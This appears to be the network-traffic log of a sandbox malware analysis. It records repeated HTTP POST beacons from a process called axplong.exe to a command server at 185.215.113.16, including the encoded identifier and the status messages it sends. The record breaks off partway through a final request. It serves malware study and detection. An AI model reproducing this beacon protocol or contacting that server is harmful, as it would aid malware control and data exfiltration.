                  Sep 25, 2024 13:53:05.375698090 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:05.603123903 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449737185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:05.711065054 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:06.430521011 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:06.431566000 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:06.660629034 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449738185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:06.773672104 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:07.480283976 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:07.481225014 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:07.706238031 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.449739185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:07.823704004 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:08.517410040 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:08.518950939 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:08.764705896 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.449740185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:08.884435892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:09.581345081 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:09.582084894 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:09.811661959 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.449741185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:09.929166079 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:10.640786886 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:10.652060032 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:10.884042978 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.449742185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:10.995743990 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:11.691813946 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:11.693386078 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:11.921874046 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.449743185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:12.039163113 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:12.759413004 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:12.760437012 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:12.988336086 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.449744185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:13.105356932 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:13.814121962 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:13.815427065 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:14.048032999 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.449745185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:14.164294004 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:14.893877983 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:14.894581079 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:15.130125999 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.449746185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:15.241519928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:15.950556040 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:15.952330112 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:16.188354015 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.449748185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:16.304864883 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:17.025926113 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:17.026726007 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:17.256524086 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.449749185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:17.367012024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:18.198535919 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:18.215010881 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
